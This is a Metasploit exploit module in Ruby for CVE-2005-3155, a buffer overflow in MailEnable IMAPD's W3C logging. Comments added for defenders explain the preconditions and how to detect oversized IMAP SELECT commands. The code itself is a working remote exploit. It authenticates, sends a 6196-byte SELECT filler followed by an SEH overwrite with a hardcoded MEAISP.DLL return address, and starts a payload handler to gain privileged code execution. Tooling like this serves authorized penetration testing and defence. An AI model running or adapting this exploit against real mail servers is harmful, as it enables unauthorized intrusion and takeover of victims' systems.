Path: blob/master/modules/exploits/windows/imap/mailenable_w3c_select.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2005-3155, a buffer overflow in the W3C logging
# path of the MailEnable IMAPD service.
#
# Preconditions stated by the module itself: W3C logging must be enabled
# (it is off by default) and the caller needs a valid IMAP username and
# password. Affected builds per the description are MailEnable Professional
# 1.6 and prior and MailEnable Enterprise 1.1 and prior.
#
# Defender notes:
# - Hosts running an affected build with W3C logging enabled are the exposed
#   population; upgrading past the listed versions or leaving W3C logging
#   disabled removes the precondition.
# - The request built in #exploit is an authenticated IMAP SELECT whose
#   mailbox argument is more than 6 KB long. A SELECT argument of that size
#   is anomalous and is a reasonable thing to alert on in IMAP traffic
#   inspection or server logs.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Imap
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata (name, references, payload constraints and
  # the single supported target) with the framework.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'MailEnable IMAPD W3C Logging Buffer Overflow',
        'Description'    => %q{
            This module exploits a buffer overflow in the W3C logging
          functionality of the MailEnable IMAPD service. Logging is
          not enabled by default and this exploit requires a valid
          username and password to exploit the flaw. MailEnable
          Professional version 1.6 and prior and MailEnable Enterprise
          version 1.1 and prior are affected.
        },
        'Author'         => [ 'MC' ],
        'License'        => MSF_LICENSE,
        'References'     =>
          [
            [ 'CVE', '2005-3155'],
            [ 'OSVDB', '19842'],
            [ 'BID', '15006'],
          ],
        # The module declares that a successful run yields a privileged
        # context, which is why exposure on this service matters.
        'Privileged'     => true,
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread',
          },
        'Payload'        =>
          {
            'Space'           => 600,
            # NUL, LF, CR and space are excluded from the payload bytes.
            'BadChars'        => "\x00\x0a\x0d\x20",
            'StackAdjustment' => -3500,
          },
        'Platform'       => 'win',
        'Targets'        =>
          [
            # Only one build is targeted; the address is tied to MEAISP.DLL.
            ['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] # MEAISP.DLL
          ],
        'DisclosureDate' => '2005-10-03',
        'DefaultTarget'  => 0
      )
    )
  end

  # Banner-based exposure check: connects, disconnects, then compares the
  # service banner against a fixed pattern.
  #
  # Returns CheckCode::Appears on a match and CheckCode::Safe otherwise.
  # The pattern is matched literally (including the `0-1.54` text), and the
  # description lists more affected builds than this one banner, so a Safe
  # result is not proof that a host is patched; confirm the installed
  # version directly when assessing exposure.
  def check
    connect
    disconnect

    affected_banner = /MailEnable Service, Version: 0-1\.54/
    return Exploit::CheckCode::Safe unless banner && banner =~ affected_banner

    Exploit::CheckCode::Appears
  end

  # Logs in with the configured credentials and sends one oversized
  # `SELECT` command: 6196 bytes of random alphanumeric filler followed by
  # the framework-generated SEH record built from the target's `Ret`.
  #
  # Statement order and the byte layout of the request are kept exactly as
  # in the original module.
  def exploit
    connect_login

    filler = rand_text_alphanumeric(6196, payload_badchars)
    seh_record = generate_seh_payload(target.ret)
    select_cmd = 'a01 SELECT ' + filler + seh_record + "\r\n"
    sock.put(select_cmd)

    handler
    disconnect
  end
end